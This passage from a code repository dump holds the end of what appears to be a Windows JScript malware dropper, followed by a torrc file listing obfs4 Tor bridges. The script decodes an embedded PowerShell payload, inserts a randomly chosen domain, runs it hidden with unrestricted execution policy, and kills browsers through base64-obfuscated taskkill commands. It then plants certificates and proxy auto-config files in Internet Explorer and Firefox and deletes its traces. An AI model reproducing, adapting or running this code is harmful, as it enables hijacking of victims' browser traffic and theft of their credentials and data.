307 | Help.BinaryDataToFile(this.FileName, bData); 308 | wss.Run("powershell -ExecutionPolicy Unrestricted -File \"" + this.FileName + 309 | "\"", 0, true) 310 | }; 311 | this.Close = function() { 312 | if (fso.FileExists(this.FileName)) { 313 | fso.DeleteFile(this.FileName) 314 | } 315 | } 316 | } 317 | 318 | function C_TP() { 319 | this.FileName = Help.GenStr(8) + ".ps1"; 320 | this.Install = function() { 321 | var indexDomain = Help.RandomNumber(0, Cfg.dl.length - 1); 322 | var Domain = Cfg.dl[indexDomain]; 323 | this.FileName = ENV_TEMP + "\\" + this.FileName; 324 | var bData = Base64.decode(Cfg.pstp); 325 | bData = bData.replace(/%DOMAIN%/g, Domain); 326 | Help.BinaryDataToFile(this.FileName, bData); 327 | wss.Run("powershell -ExecutionPolicy Unrestricted -File \"" + this.FileName + 328 | "\"", 0, true) 329 | }; 330 | this.Close = function() { 331 | if (fso.FileExists(this.FileName)) { 332 | fso.DeleteFile(this.FileName) 333 | } 334 | } 335 | } 336 | 337 | function Core() { 338 | this.Init = function() { 339 | Exp = new C_IE(); 340 | Fire = new C_FF(); 341 | TP = new C_TP() 342 | }; 343 | this.S = function() { 344 | this.Init(); 345 | TP.Install(); 346 | this.CAB(); 347 | this.IIE(); 348 | this.IF(); 349 | this.Close() 350 | }; 351 | this.IIE = function() { 352 | Exp.IC(); 353 | Exp.InstallPac() 354 | }; 355 | this.IF = function() { 356 | Fire.InstallCert(); 357 | Fire.InstallPac() 358 | }; 359 | this.CAB = function() { 360 | wss.Run(Base64.decode("dGFza2tpbGwgL0YgL2ltIGlleHBsb3JlLmV4ZQ=="), 361 | 0, false); 362 | wss.Run(Base64.decode("dGFza2tpbGwgL0YgL2ltIGZpcmVmb3guZXhl"), 0, 363 | false); 364 | wss.Run(Base64.decode("dGFza2tpbGwgL0YgL2ltIGNocm9tZS5leGU="), 0, 365 | false) 366 | }; 367 | this.Close = function() { 368 | Exp.Close(); 369 | Fire.Close(); 370 | TP.Close() 371 | } 372 | } 373 | var main = new Core(); 374 | main.S(); 375 | -------------------------------------------------------------------------------- /torrc: -------------------------------------------------------------------------------- 1 | UseBridges 1 2 | ClientTransportPlugin obfs4 exec obfs4proxy.exe managed 3 | Bridge obfs4 178.62.219.242:9443 2EEFFD91A0FC61CFABD1978E72A035F92A382813 cert=AnnSG9ljfgARf9feBw5W2IGstTXzQieXHLXwhThgSDmpedPuNDNAaXB8zq8oye+Z34c8Hg iat-mode=0 4 | Bridge obfs4 194.132.209.154:59888 B837EF0383C0B1330A987B9C5DFB6F2CBDA35CAA cert=qKJVwcsdxElPzMbow21rojHRCBZdxAdwuxXnQU1lg/s9IF5eh+7uiimbpkTEwRXuMTERTw iat-mode=0 5 | Bridge obfs4 45.55.1.74:9443 6F18FEFBB0CAECD5ABA755312FCCB34FC11A7AB8 cert=w8H/x6igCxligbF2XBIcxNEWq+ziU9h15rtwik82oAqNXZwJ25oHwalzRYK5WOJIAeKcCQ iat-mode=0 6 | Bridge obfs4 38.229.33.146:44950 969D071BD89A68C15949156CD1CA29A33AF635C2 cert=vbah6jDkKS0NRqW1xgKg6Kd3Unr1P125vDvD9FbYodZ/fsqQ/MWDK277PNAJiGudzHEBGg iat-mode=1 7 | Bridge obfs4 194.132.209.19:41478 783E276C6889BF73907F295AA93219F7762BB906 cert=oD0Ix5POrRMWE0F4ats4TSbVHw+x35+CeWesom8S5Rxr9V6dTNooXb5QebEIFLe78YicLw iat-mode=0 8 | Bridge obfs4 192.36.31.122:44994 63F51688B389666DB0F0556C56E979516D2B9D38 cert=QKXIBg+re7fLimmBMbJntbU7www0Ua1CfOU/X+YUsP1I3NsqKRCJX9WT6QTa9Hmmxi18Xg iat-mode=0 9 | --------------------------------------------------------------------------------